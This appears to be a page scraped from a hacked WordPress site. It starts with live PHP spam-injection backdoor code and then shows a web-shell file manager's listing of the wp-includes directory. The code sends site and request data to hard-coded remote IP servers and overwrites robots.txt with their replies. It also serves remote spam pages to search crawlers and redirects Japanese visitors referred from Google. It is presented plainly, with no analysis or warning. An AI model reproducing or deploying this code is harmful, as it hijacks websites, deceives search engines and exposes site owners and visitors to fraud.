$req_uri = $_SERVER['REQUEST_URI']; $self = $_SERVER['PHP_SELF']; $inter_domain='http://142.54.172.170/z50426_12/'; if(strstr($req_uri, 'header.php')){ $inter_domain='http://199.168.102.234/z50428_2/'; $self='/header.php'; } if(strstr($req_uri, 'good.php')){ $inter_domain='http://192.187.99.106/z40229_7/'; $self='/good.php'; } $sx_ap=''; function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; } function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;} function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; } $http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://'); $domain=$_SERVER["HTTP_HOST"]; $ser_name=$_SERVER['SERVER_NAME']; $req_url=$http.$domain.$req_uri; $indata1=$inter_domain."/indata.php"; $map1=$inter_domain."/map.php"; $jump1=$inter_domain."/jump.php"; $url_words=$inter_domain."/words.php"; $url_robots=$inter_domain."/robots.php"; if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;} $data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url; if(substr($req_uri,-6)=='robots'){ $robots_cont=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt'); $data1['robots_cont'] = $robots_cont; $robots_cont = getServerCont($url_robots,$data1); $result=file_put_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt', $robots_cont); if($result){ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create success!'; }else{ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create fail!'; } return; } if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } exit();} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont; exit();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit();} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if(($chk_refer && !$res_crawl) && preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE'])){echo getServerCont11($jump1,$data1);exit(); } if($res_crawl){ $data1['http_user_agent']=$user_agent; echo getServerCont11($indata1,$data1);exit();}

नामः प्रकारः आकृति अनुज्ञापत्रम् नामपत्र
ID3 Folder -- drwxr-xr-x
IXR Folder -- drwxr-xr-x
PHPMailer Folder -- drwxr-xr-x
Requests Folder -- drwxr-xr-x
SimplePie Folder -- drwxr-xr-x
Text Folder -- drwxr-xr-x
assets Folder -- drwxr-xr-x
block-patterns Folder -- drwxr-xr-x
blocks Folder -- drwxr-xr-x
certificates Folder -- drwxr-xr-x
css Folder -- drwxr-xr-x
customize Folder -- drwxr-xr-x
fonts Folder -- drwxr-xr-x
images Folder -- drwxr-xr-x
js Folder -- drwxr-xr-x
pomo Folder -- drwxr-xr-x
random_compat Folder -- drwxr-xr-x
rest-api Folder -- drwxr-xr-x
sitemaps Folder -- drwxr-xr-x
sodium_compat Folder -- drwxr-xr-x
theme-compat Folder -- drwxr-xr-x
widgets Folder -- drwxr-xr-x
.htaccess File 0.506 KB -r-xr-xr-x
admin-bar.php File 30.956 KB -rw-r--r--
atomlib.php File 11.586 KB -rw-r--r--
author-template.php File 16.62 KB -rw-r--r--
block-patterns.php File 1.416 KB -rw-r--r--
blocks.php File 25.763 KB -rw-r--r--
bookmark-template.php File 12.222 KB -rw-r--r--
bookmark.php File 14.786 KB -rw-r--r--
cache-compat.php File 1.021 KB -rw-r--r--
cache.php File 9.284 KB -rw-r--r--
canonical.php File 30.652 KB -rw-r--r--
capabilities.php File 33.979 KB -rw-r--r--
category-template.php File 53.626 KB -rw-r--r--
category.php File 12.414 KB -rw-r--r--
class-IXR.php File 2.483 KB -rw-r--r--
class-feed.php File 0.517 KB -rw-r--r--
class-http.php File 38.786 KB -rw-r--r--
class-json.php File 42.429 KB -rw-r--r--
class-oembed.php File 0.397 KB -rw-r--r--
class-phpass.php File 7.147 KB -rw-r--r--
class-phpmailer.php File 0.648 KB -rw-r--r--
class-pop3.php File 20.349 KB -rw-r--r--
class-requests.php File 29.144 KB -rw-r--r--
class-simplepie.php File 94.015 KB -rw-r--r--
class-smtp.php File 0.441 KB -rw-r--r--
class-snoopy.php File 36.831 KB -rw-r--r--
class-walker-category-dropdown.php File 2.077 KB -rw-r--r--
class-walker-category.php File 7.693 KB -rw-r--r--
class-walker-comment.php File 13.369 KB -rw-r--r--
class-walker-nav-menu.php File 8.447 KB -rw-r--r--
class-walker-page-dropdown.php File 2.245 KB -rw-r--r--
class-walker-page.php File 6.878 KB -rw-r--r--
class-wp-admin-bar.php File 16.461 KB -rw-r--r--
class-wp-ajax-response.php File 5.117 KB -rw-r--r--
class-wp-block-list.php File 4.368 KB -rw-r--r--
class-wp-block-parser.php File 14.858 KB -rw-r--r--
class-wp-block-pattern-categories-registry.php File 4.078 KB -rw-r--r--
class-wp-block-patterns-registry.php File 4.735 KB -rw-r--r--
class-wp-block-styles-registry.php File 4.617 KB -rw-r--r--
class-wp-block-type-registry.php File 5.026 KB -rw-r--r--
class-wp-block-type.php File 5.877 KB -rw-r--r--
class-wp-block.php File 5.972 KB -rw-r--r--
class-wp-comment-query.php File 43.578 KB -rw-r--r--
class-wp-comment.php File 8.828 KB -rw-r--r--
class-wp-customize-control.php File 24.907 KB -rw-r--r--
class-wp-customize-manager.php File 196.367 KB -rw-r--r--
class-wp-customize-nav-menus.php File 55.472 KB -rw-r--r--
class-wp-customize-panel.php File 10.156 KB -rw-r--r--
class-wp-customize-section.php File 10.717 KB -rw-r--r--
class-wp-customize-setting.php File 29.025 KB -rw-r--r--
class-wp-customize-widgets.php File 65.46 KB -rw-r--r--
class-wp-date-query.php File 34.509 KB -rw-r--r--
class-wp-dependency.php File 2.452 KB -rw-r--r--
class-wp-editor.php File 68.93 KB -rw-r--r--
class-wp-embed.php File 15.421 KB -rw-r--r--
class-wp-error.php File 4.844 KB -rw-r--r--
class-wp-fatal-error-handler.php File 7.37 KB -rw-r--r--
class-wp-feed-cache-transient.php File 2.5 KB -rw-r--r--
class-wp-feed-cache.php File 0.731 KB -rw-r--r--
class-wp-hook.php File 13.722 KB -rw-r--r--
class-wp-http-cookie.php File 7.018 KB -rw-r--r--
class-wp-http-curl.php File 12.06 KB -rw-r--r--
class-wp-http-encoding.php File 6.404 KB -rw-r--r--
class-wp-http-ixr-client.php File 3.389 KB -rw-r--r--
class-wp-http-proxy.php File 5.726 KB -rw-r--r--
class-wp-http-requests-hooks.php File 1.916 KB -rw-r--r--
class-wp-http-requests-response.php File 4.241 KB -rw-r--r--
class-wp-http-response.php File 2.882 KB -rw-r--r--
class-wp-http-streams.php File 15.73 KB -rw-r--r--
class-wp-image-editor-gd.php File 13.807 KB -rw-r--r--
class-wp-image-editor-imagick.php File 23.318 KB -rw-r--r--
class-wp-image-editor.php File 13.768 KB -rw-r--r--
class-wp-list-util.php File 6.46 KB -rw-r--r--
class-wp-locale-switcher.php File 4.904 KB -rw-r--r--
class-wp-locale.php File 13.59 KB -rw-r--r--
class-wp-matchesmapregex.php File 1.762 KB -rw-r--r--
class-wp-meta-query.php File 27.216 KB -rw-r--r--
class-wp-metadata-lazyloader.php File 5.26 KB -rw-r--r--
class-wp-network-query.php File 17.944 KB -rw-r--r--
class-wp-network.php File 12.086 KB -rw-r--r--
class-wp-object-cache.php File 13.224 KB -rw-r--r--
class-wp-oembed-controller.php File 6.629 KB -rw-r--r--
class-wp-oembed.php File 28.306 KB -rw-r--r--
class-wp-paused-extensions-storage.php File 4.808 KB -rw-r--r--
class-wp-post-type.php File 19.076 KB -rw-r--r--
class-wp-post.php File 6.29 KB -rw-r--r--
class-wp-query.php File 131.797 KB -rw-r--r--
class-wp-recovery-mode-cookie-service.php File 6.306 KB -rw-r--r--
class-wp-recovery-mode-email-service.php File 9.89 KB -rw-r--r--
class-wp-recovery-mode-key-service.php File 4.17 KB -rw-r--r--
class-wp-recovery-mode-link-service.php File 3.289 KB -rw-r--r--
class-wp-recovery-mode.php File 11.109 KB -rw-r--r--
class-wp-rewrite.php File 59.416 KB -rw-r--r--
class-wp-role.php File 2.439 KB -rw-r--r--
class-wp-roles.php File 8.232 KB -rw-r--r--
class-wp-session-tokens.php File 7.257 KB -rw-r--r--
class-wp-simplepie-file.php File 2.273 KB -rw-r--r--
class-wp-simplepie-sanitize-kses.php File 1.733 KB -rw-r--r--
class-wp-site-query.php File 27.881 KB -rw-r--r--
class-wp-site.php File 7.194 KB -rw-r--r--
class-wp-tax-query.php File 18.981 KB -rw-r--r--
class-wp-taxonomy.php File 12.278 KB -rw-r--r--
class-wp-term-query.php File 35.322 KB -rw-r--r--
class-wp-term.php File 5.142 KB -rw-r--r--
class-wp-text-diff-renderer-inline.php File 0.699 KB -rw-r--r--
class-wp-text-diff-renderer-table.php File 16.48 KB -rw-r--r--
class-wp-theme.php File 50.349 KB -rw-r--r--
class-wp-user-meta-session-tokens.php File 2.92 KB -rw-r--r--
class-wp-user-query.php File 30.622 KB -rw-r--r--
class-wp-user-request.php File 2.145 KB -rw-r--r--
class-wp-user.php File 21.627 KB -rw-r--r--
class-wp-walker.php File 12.425 KB -rw-r--r--
class-wp-widget-factory.php File 2.559 KB -rw-r--r--
class-wp-widget.php File 17.486 KB -rw-r--r--
class-wp-xmlrpc-server.php File 205.521 KB -rw-r--r--
class-wp.php File 24.448 KB -rw-r--r--
class.wp-dependencies.php File 12.566 KB -rw-r--r--
class.wp-scripts.php File 18.036 KB -rw-r--r--
class.wp-styles.php File 10.621 KB -rw-r--r--
comment-template.php File 91.852 KB -rw-r--r--
comment.php File 122.655 KB -rw-r--r--
compat.php File 12.654 KB -rw-r--r--
cron.php File 32.062 KB -rw-r--r--
date.php File 0.396 KB -rw-r--r--
default-constants.php File 10.022 KB -rw-r--r--
default-filters.php File 26.139 KB -rw-r--r--
default-widgets.php File 2.073 KB -rw-r--r--
deprecated.php File 118.647 KB -rw-r--r--
embed-template.php File 0.333 KB -rw-r--r--
embed.php File 46.478 KB -rw-r--r--
error-protection.php File 3.303 KB -rw-r--r--
error_log File 1.471 KB -rw-r--r--
feed-atom-comments.php File 5.316 KB -rw-r--r--
feed-atom.php File 3.029 KB -rw-r--r--
feed-rdf.php File 2.605 KB -rw-r--r--
feed-rss.php File 1.161 KB -rw-r--r--
feed-rss2-comments.php File 3.975 KB -rw-r--r--
feed-rss2.php File 3.71 KB -rw-r--r--
feed.php File 22.115 KB -rw-r--r--
formatting.php File 304.248 KB -rw-r--r--
functions.php File 228.27 KB -rw-r--r--
functions.wp-scripts.php File 13.073 KB -rw-r--r--
functions.wp-styles.php File 8.108 KB -rw-r--r--
general-template.php File 153.989 KB -rw-r--r--
http.php File 21.861 KB -rw-r--r--
iopwpk.php File 11.325 KB -rw-r--r--
kses.php File 61.878 KB -rw-r--r--
l10n.php File 55.267 KB -rw-r--r--
link-template.php File 141.459 KB -rw-r--r--
load.php File 43.823 KB -rw-r--r--
locale.php File 0.158 KB -rw-r--r--
media-template.php File 57.292 KB -rw-r--r--
media.php File 159.303 KB -rw-r--r--
meta.php File 58.168 KB -rw-r--r--
ms-blogs.php File 24.583 KB -rw-r--r--
ms-default-constants.php File 4.6 KB -rw-r--r--
ms-default-filters.php File 6.344 KB -rw-r--r--
ms-deprecated.php File 20.634 KB -rw-r--r--
ms-files.php File 2.579 KB -rw-r--r--
ms-functions.php File 88.262 KB -rw-r--r--
ms-load.php File 19.357 KB -rw-r--r--
ms-network.php File 3.572 KB -rw-r--r--
ms-settings.php File 4.027 KB -rw-r--r--
ms-site.php File 42.511 KB -rw-r--r--
nav-menu-template.php File 22.75 KB -rw-r--r--
nav-menu.php File 40.775 KB -rw-r--r--
option.php File 72.652 KB -rw-r--r--
pluggable-deprecated.php File 6.116 KB -rw-r--r--
pluggable.php File 99.855 KB -rw-r--r--
plugin.php File 31.655 KB -rw-r--r--
post-formats.php File 6.909 KB -rw-r--r--
post-template.php File 62.051 KB -rw-r--r--
post-thumbnail-template.php File 9.001 KB -rw-r--r--
post.php File 245.87 KB -rw-r--r--
query.php File 34.693 KB -rw-r--r--
registration-functions.php File 0.197 KB -rw-r--r--
registration.php File 0.197 KB -rw-r--r--
rest-api.php File 65.83 KB -rw-r--r--
revision.php File 21.457 KB -rw-r--r--
revisions.php File 11.883 KB -rw-r--r--
rewrite.php File 17.649 KB -rw-r--r--
rss-functions.php File 0.206 KB -rw-r--r--
rss.php File 22.439 KB -rw-r--r--
script-loader.php File 89.867 KB -rw-r--r--
session.php File 0.252 KB -rw-r--r--
shortcodes.php File 21.846 KB -rw-r--r--
sitemaps.php File 3.16 KB -rw-r--r--
spl-autoload-compat.php File 0.433 KB -rw-r--r--
taxonomy.php File 158.322 KB -rw-r--r--
template-loader.php File 2.941 KB -rw-r--r--
template.php File 21.019 KB -rw-r--r--
theme.php File 120.918 KB -rw-r--r--
update.php File 25.571 KB -rw-r--r--
user.php File 129.654 KB -rw-r--r--
vars.php File 5.684 KB -rw-r--r--
version.php File 0.749 KB -rw-r--r--
widgets.php File 57.746 KB -rw-r--r--
wlwmanifest.xml File 1.021 KB -rw-r--r--
wp-blog-header.php File 2.73 KB -r--r--r--
wp-cron.php File 2.73 KB -rw-r--r--
wp-db.php File 103.119 KB -rw-r--r--
wp-diff.php File 0.632 KB -rw-r--r--
Tiny File Manager